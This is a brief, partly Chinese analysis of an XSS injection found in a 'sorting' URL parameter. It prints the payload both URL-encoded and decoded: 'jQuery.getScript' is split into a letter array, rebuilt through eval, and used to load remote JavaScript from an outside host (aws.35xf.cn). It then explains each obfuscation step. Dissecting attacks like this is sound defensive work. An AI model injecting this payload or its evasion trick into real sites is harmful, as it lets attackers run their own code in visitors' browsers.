...
&sorting=%27;var%20a=[%27j%27,%27Q%27,%27u%27,%27e%27,%27r%27,%27y%27,%27.%27,%27g%27,%27e%27,%27t%27,%27S%27,%27c%27,%27r%27,%27i%27,%27p%27,%27t%27],b=eval,c=b(a.join(%27%27));c(%27http://aws.35xf.cn/bridge/b.js%27);;%27
...
...
&sorting=';var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t'],b=eval,c=b(a.join(''));c('http://aws.35xf.cn/bridge/b.js');;'
...
- 注入XSS分析
- 把script命令拆成字母数组 -- a
var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t']
- 建立转换命令 -- b
b=eval
- 建立伪装script调用命令 -- c
c=b(a.join(''))
- 执行c命令,调用远程js -- c(js)
c('http://aws.35xf.cn/bridge/b.js')
